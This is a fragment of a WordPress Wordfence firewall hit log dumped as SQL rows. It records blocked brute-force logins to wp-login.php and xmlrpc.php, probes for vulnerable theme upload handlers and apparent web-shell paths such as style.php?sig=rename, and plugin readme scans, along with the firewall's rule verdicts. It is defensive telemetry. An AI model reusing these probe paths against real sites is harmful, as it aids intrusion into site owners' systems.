Network',NULL),(15590,0.000000,1704959617.427970,'*\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15586,0.000000,1704956973.286899,' A\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15587,0.000000,1704957804.467452,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15585,0.000000,1704955497.958103,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15584,0.000000,1704954312.078570,'\0\0\0\0\0\0\0\0\0\0N',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0','loginFailValidUsername',NULL,NULL),(15583,0.000000,1704954283.024979,'\0\0\0\0\0\0\0\0\0\0U[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15566,0.000000,1704941636.632941,'*PT\0e',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailValidUsername',NULL,NULL),(15567,0.000000,1704941639.935625,'*cC\0 fC',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15568,0.000000,1704943449.545089,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15569,0.000000,1704944143.422939,'\0\0\0\0\0\0\0\0\0\0Uu',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15570,0.000000,1704945259.350042,' A\0>\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15571,1704945725.759816,1704945725.693400,'\0\0\0\0\0\0\0\0\0\03ޞ',0,403,0,0,0,'https://tummyrevolution.com/chosen.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15573,0.000000,1704947036.047226,'\0\0\0\0\0\0\0\0\0\0э-',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15574,0.000000,1704947074.471982,'&\0\0\0\0\0\04\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15575,1704947356.541321,1704947356.473500,'\0\0\0\0\0\0\0\0\0\0٠\'',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15572,0.000000,1704946627.263524,'\0\0\0\0\0\0\0\0\0\0m{ ',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0','loginFailValidUsername',NULL,NULL),(15576,0.000000,1704948298.689302,'\0\0\0\0\0\0\0\0\0\0b0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15577,0.000000,1704948871.214838,'\0\0\0\0\0\0\0\0\0\0q+',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15578,0.000000,1704949128.886675,'\0\0\0\0\0\0\0\0\0\0̾',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0','loginFailInvalidUsername',NULL,NULL),(15579,0.000000,1704950662.506574,' A\0$T\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15580,0.000000,1704951843.284824,'\0\0\0\0\0\0\0\0\0\09',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15565,0.000000,1704940560.768985,'\0\0\0\0\0\0\0\0\0\0Y+',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15561,0.000000,1704939233.134580,'\0\0\0\0\0\0\0\0\0\0n+',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15562,0.000000,1704939843.887980,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15563,1704940338.882721,1704940338.827300,' &G\0\0\0\0\0\0&G',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2V2b2x2ZS9qcy9iYWNrLWVuZC9saWJyYXJpZXMvZmlsZXVwbG9hZGVyL3VwbG9hZF9oYW5kbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15581,0.000000,1704952468.836328,'\0\0\0\0\0\0\0\0\0\0q',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15559,0.000000,1704938185.470499,'\0\0\0\0\0\0\0\0\0\0-=',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15560,0.000000,1704938438.188313,'\0\0\0\0\0\0\0\0\0\0b8',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15558,0.000000,1704938050.996921,'\0\0\0\0\0\0\0\0\0\0 ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15582,0.000000,1704952716.392124,'\0\0\0\0\0\0\0\0\0\0FL+',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15564,1704940336.148937,1704940336.072700,' &G\0\0\0\0\0\0&G',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.css',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3B1cmV2aXNpb24vc2NyaXB0cy9hZG1pbi91cGxvYWRpZnkvdXBsb2FkaWZ5LmNzcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15557,1704937022.503418,1704937022.412200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15556,1704937038.630707,1704937038.559300,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15555,0.000000,1704936561.465740,'\0\0\0\0\0\0\0\0\0\0G\r',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15554,0.000000,1704936279.830340,'\0\0\0\0\0\0\0\0\0\08',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15553,0.000000,1704934501.621094,'\0\0\0\0\0\0\0\0\0\0m<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15549,0.000000,1704931629.522996,' A\0O\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15550,0.000000,1704931654.331419,'\0\0\0\0\0\0\0\0\0\0[8',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15551,0.000000,1704932737.717317,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15552,0.000000,1704933987.295551,'$\0~+\0cW',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15548,0.000000,1704931575.657170,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15547,0.000000,1704931575.696852,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15543,0.000000,1704930626.884984,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15544,0.000000,1704930981.341300,'\0\0\0\0\0\0\0\0\0\0Ո]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15545,1704931100.592577,1704931100.491000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15546,1704931100.586841,1704931100.478400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15542,0.000000,1704930626.839343,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15541,1704930148.974681,1704930148.904800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15540,1704930149.001478,1704930148.906400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15535,1704929213.234155,1704929213.148700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15536,1704929213.225891,1704929213.136600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15537,0.000000,1704929257.572945,'\0\0\0\0\0\0\0\0\0\0n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15538,0.000000,1704929683.107953,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15539,0.000000,1704929683.127489,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15533,0.000000,1704928913.300871,'\0\0\0\0\0\0\0\0\0\0@c',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15534,0.000000,1704929165.523546,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15522,0.000000,1704926846.352708,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15523,0.000000,1704926846.239321,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15524,1704927308.910409,1704927308.809400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15525,1704927308.908153,1704927308.807500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15521,1704926378.666087,1704926378.569800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15520,1704926378.677369,1704926378.570000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15526,0.000000,1704927549.411589,'\0\0\0\0\0\0\0\0\0\0+?',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15527,0.000000,1704927774.742772,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15528,0.000000,1704927774.740869,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15529,1704928252.136974,1704928252.030300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15530,1704928252.128676,1704928252.031200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15531,0.000000,1704928744.270728,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15532,0.000000,1704928744.224271,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15519,1704926723.545022,1704926723.486200,'\0\0\0\0\0\0\0\0\0\0[\\w',0,200,0,0,0,'https://tummyrevolution.com/wp-content/plugins/ai-engine/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(15515,0.000000,1704925905.202966,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15516,0.000000,1704925905.173513,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15517,0.000000,1704926210.104976,'\0\0\0\0\0\0\0\0\0\0Jl',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15518,1704926723.545397,1704926723.486200,'\0\0\0\0\0\0\0\0\0\0[\\w',0,200,0,0,0,'https://tummyrevolution.com/wp-content/plugins/ai-engine/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9haS1lbmdpbmUvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(15514,0.000000,1704925855.765668,'\0\0\0\0\0\0\0\0\0\0J',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15510,0.000000,1704924963.808167,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15511,1704925437.771097,1704925437.682000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15512,1704925437.770982,1704925437.682100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15513,0.000000,1704925502.638253,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15508,1704924490.227658,1704924490.132200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security 